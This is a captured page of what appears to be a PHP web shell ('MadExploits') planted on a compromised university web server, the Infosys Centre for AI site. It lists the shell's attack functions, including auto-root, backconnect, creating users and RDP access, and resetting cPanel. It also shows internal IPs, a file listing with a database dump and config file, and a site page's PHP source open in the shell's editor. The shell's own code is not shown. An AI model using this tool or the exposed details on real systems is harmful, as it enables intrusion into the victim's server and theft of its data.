Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
docs
[ DIR ]
drwxr-x--x
image
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
img
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
old
[ DIR ]
drwxr-x--x
scss
[ DIR ]
drwxr-x--x
about.php
10.29
KB
-rwxr-x--x
btech-csai.php
22.84
KB
-rwxr-x--x
cairamjee120523.sql
136.45
KB
-rwxr-x--x
cc-csai.php
12.89
KB
-rwxr-x--x
codeAI.php
11.5
KB
-rwxr-x--x
collaboration.php
8.41
KB
-rwxr-x--x
contact.php
10.95
KB
-rwxr-x--x
courses.php
22.38
KB
-rwxr-x--x
dbconfig.php
1.22
KB
-rwxr-x--x
education.php
8.28
KB
-rwxr-x--x
events.php
24.36
KB
-rwxr-x--x
index.php
23.22
KB
-rwxr-x--x
mediacoverage.php
24.18
KB
-rwxr-x--x
mtech-csai.php
16.85
KB
-rwxr-x--x
people-bkp.php
49.56
KB
-rwxr-x--x
people.php
66.86
KB
-rwxr-x--x
project.php
10.99
KB
-rwxr-x--x
project_old07032022.php
8.86
KB
-rwxr-x--x
publications.php
12.48
KB
-rwxr-x--x
research.php
10.39
KB
-rwxr-x--x
staff.php
8.7
KB
-rwxr-x--x
students.php
23.91
KB
-rwxr-x--x
tab.php
5.43
KB
-rwxr-x--x
talks.php
22.09
KB
-rwxr-x--x
vacancies.php
8.55
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : publications.php
<?php require_once 'dbconfig.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Infosys Centre for AI</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <!-- Favicon --> <link href="img/favicon.ico" rel="icon"> <!-- Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Nunito:wght@600;700;800&display=swap" rel="stylesheet"> <!-- Icon Font Stylesheet --> <link href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> <!-- Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <!-- Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Template Stylesheet --> <link href="css/style.css" rel="stylesheet"> </head> <body> <!-- Navbar Start --> <nav class="navbar navbar-expand-lg bg-white shadow navbar-light sticky-top p-0"> <a href="index.php" class="navbar-brand d-flex align-items-center px-4 px-lg-5"> <h2 class="m-0 text-primary"><img src="img/logo.png" style="width: 70%;"></h2> </a> <button type="button" class="navbar-toggler me-4" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto p-4 p-lg-0"> <a href="index.php" class="nav-item nav-link ">Home</a> <div class="nav-item dropdown"> <a href="research.php" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Research</a> <div class="dropdown-menu fade-down m-0"> <a href="publications.php" class="dropdown-item ">Publications</a> <a href="project.php" class="dropdown-item">Projects</a> <a href="collaboration.php" class="dropdown-item">Collaborations</a> </div> </div> <div class="nav-item dropdown"> <a href="!#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Education</a> <div class="dropdown-menu fade-down m-0"> <a href="education.php" class="dropdown-item ">Courses</a> <a href="codeAI.php" class="dropdown-item">Code AI</a> </div> </div> <div class="nav-item dropdown"> <a href="!#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">People</a> <div class="dropdown-menu fade-down m-0"> <a href="people.php" class="dropdown-item">Faculty</a> <a href="staff.php" class="dropdown-item">Staff</a> <!--<a href="students.php" class="dropdown-item">Students</a>--> </div> </div> <a href="vacancies.php" class="nav-item nav-link">Jobs</a> <div class="nav-item dropdown"> <a class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Activities</a> <div class="dropdown-menu fade-down m-0"> <a href="talks.php" class="dropdown-item">Talks</a> <a href="events.php" class="dropdown-item ">Events</a> <a href="mediacoverage.php" class="dropdown-item">Media Coverage</a> </div> </div> <a href="contact.php" class="nav-item nav-link">Contact</a> </div> </div> </nav> <!-- Navbar End --> <!-- Header Start --> <div class="container-fluid bg-primary py-5 mb-5 page-header"> <div class="container py-5"> <div class="row justify-content-center"> <div class="col-lg-10 text-center"> <h1 class="display-3 text-white animated slideInDown">Publications</h1> </div> </div> </div> </div> <!-- Header End --> <section id="ts-intro" class="ts-intro"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class="featured-tab"> <?php $result = $DB_con->prepare( "SELECT distinct ddlYears FROM publicationstbl where STATUS=2" ); $result->execute(); $tab_menu = ''; $i = 0; $tab_content = ''; while ( $row = $result->fetch() ) { if ( $i == 0 ) { $tab_menu .= ' <li> <a class="animated fadeIn active" href="#y' . $row[ "ddlYears" ] . '" data-bs-toggle="tab"> <span class="tab-head"> <span class="tab-text-title">' . $row[ "ddlYears" ] . '</span> </span> </a> </li>'; $tab_content .= ' <div class="tab-pane active mb-5" id="y' . $row[ "ddlYears" ] . '">'; } else { $tab_menu .= ' <li> <a class="animated fadeIn" href="#y' . $row[ "ddlYears" ] . '" data-bs-toggle="tab"> <span class="tab-head"> <span class="tab-text-title">' . $row[ "ddlYears" ] . '</span> </span> </a> </li>'; $tab_content .= ' <div id="y' . $row[ "ddlYears" ] . '" class="tab-pane mb-5">'; } $product_result = $DB_con->prepare( "SELECT * FROM publicationstbl WHERE ddlYears = '" . $row[ "ddlYears" ] . "' AND STATUS=2" ); $product_result->execute(); while($sub_row = $product_result->fetch()){ $typeC = $sub_row[ "typeC" ]; $tab_content .= ' <ul class="list-arrow">'; if($typeC == "Conferences"){ $tab_content .= ' <li class="conf column" data-teacher="'.$sub_row[ "areaType" ].'" data-level="'.$sub_row[ "typeC" ].'">'; } else { $tab_content .= ' <li class="jon column" data-teacher="'.$sub_row[ "areaType" ].'" data-level="'.$sub_row[ "typeC" ].'">'; } $tab_content .= $sub_row[ "contentmsg" ] ; $tab_content .= '</li> </ul>'; } $tab_content .= '</div>' ; $i++; } ?> <ul class="nav nav-tabs"> <?php echo $tab_menu; ?> </ul> <div class="row"> <div class="text-start mb-3 col-md-2" style="margin-left: 15px;"> <!--<select class="teachers" style="width: 100%;"> <option value="all">All Area</option> <option value="Area 1"> Area 1</option> <option value="Area 2"> Area 2</option> </select> --> <select class="teachers" style="width: 100%;"> <option value="all">All Area</option> <option value="Software Security">Software Security</option> <option value="Mobile Systems and Applications">Mobile Systems and Applications</option> <option value="Wireless Sensor Networks">Wireless Sensor Networks</option> <option value="Healthcare Informatics">Healthcare Informatics</option> <option value="Knowledge Graphs">Knowledge Graphs</option> <option value="Data Mining">Data Mining</option> <option value="NLP">NLP</option> <option value="Biometrics and Forensics">Biometrics and Forensics</option> <option value="Computer Vision">Computer Vision</option> <option value="Machine-Deep Learning">Machine-Deep Learning</option> <option value="Image processing">Image processing</option> <option value="Speech-Audio Processing">Speech-Audio Processing</option> <option value="Biomedical Signal Processing">Biomedical Signal Processing</option> <option value="Human-Robot Interaction">Human-Robot Interaction</option> </select> </div> <div class="text-start mb-3 col-md-2" style="margin-left: 15px;"> <select class="typeCJ" style="width: 100%;"> <option value="all">All Conferences/Journals</option> <option value="Conferences">Conferences</option> <option value="Journals">Journals</option> </select> </div> <?php //$query = "SELECT COUNT(*) FROM users_registration"; $staff=$DB_con->prepare("SELECT count(*) FROM publicationstbl where typeC='Conferences' AND STATUS=2"); $staff->execute(); $staffrow = $staff->fetch(PDO::FETCH_NUM); $staffcount = $staffrow[0]; $staffj=$DB_con->prepare("SELECT count(*) FROM publicationstbl where typeC='Journals' AND STATUS=2"); $staffj->execute(); $staffrowj = $staffj->fetch(PDO::FETCH_NUM); $staffcountj = $staffrowj[0]; ?> <div class="mb-3 col-md-4" style="margin-left: 15px;"> <strong>Color Code:</strong> <span><i class="fas fa-square conf-i"></i></span> <span>Conferences: </span> <span><?php echo $staffcount; ?> </span> <span><i class="fas fa-square jon-i"></i></span> <span>Journals: </span> <span><?php echo $staffcountj; ?> </span> </div> </div> <div class="tab-content FilterContainer"> <?php echo $tab_content; ?> </div> <!-- tab content --> </div> <!-- Featured tab end --> </div> <!-- Col end --> </div> <!-- Content Row end --> </div> <!-- Container end --> </section> <!-- Intro area end --> <!-- Footer Start --> <div class="container-fluid bg-dark text-light footer pt-5"> <div class="container"> <div class="copyright"> <div class="row"> <div class="col-md-6 text-center text-md-start mb-3 mb-md-0"> <a href="https://cai.iiitd.ac.in">Infosys Centre for AI</a>, Copyright © 2022 - Designed & Maintained by IIIT-Delhi Web Admin. </div> <div class="col-md-3 d-flex pt-0"> <a class="btn btn-outline-light btn-social" href="https://twitter.com/iiitdcai"><i class="fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href="https://www.facebook.com/IIITDelhi"><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href="https://www.youtube.com/channel/UCKnRN-9ht_uca8nIdhyTAtQ/videos"><i class="fab fa-youtube"></i></a> <a class="btn btn-outline-light btn-social" href="https://in.linkedin.com/school/iiit-delhi/"><i class="fab fa-linkedin-in"></i></a> <a class="btn btn-outline-light btn-social" href="https://www.instagram.com/iiit.delhi/"><i class="fab fa-instagram"></i></a> </div> <!--<div class="col-md-3 text-center text-md-end"> <div class="footer-menu"> <a href="index.php">Home</a> <a href="about.php">About Us</a> <a href="contact.php">Contact Us</a> </div> </div> --> </div> </div> </div> </div> <!-- Footer End --> <!-- Back to Top --> <a href="#" class="btn btn-lg btn-primary btn-lg-square back-to-top"><i class="bi bi-arrow-up"></i></a> <!-- JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script src="lib/waypoints/waypoints.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <!-- Template Javascript --> <script src="js/main.js"></script> <script type="text/javascript"> $("select.typeCJ, select.teachers").change(updateStudents); $("#myInput").on("keyup", updateStudents); function updateStudents() { var level = $('select.typeCJ').val(); // var gender = $('select.gender').val(); var teachers = $('select.teachers').val(); // var search = $("#myInput").val(); $('.FilterContainer') .find('.column') .hide() .filter(function() { var okLevel = true; var okTeachers = true; //var okSearch = true; if (level !== "all") { okLevel = $(this).attr('data-level') === level; } if (teachers !== "all") { okTeachers = $(this).attr('data-teacher') === teachers; } //only fade a room if it satisfies all four conditions return okLevel && okTeachers ; }).fadeIn('fast'); } </script> </body> </html>
Close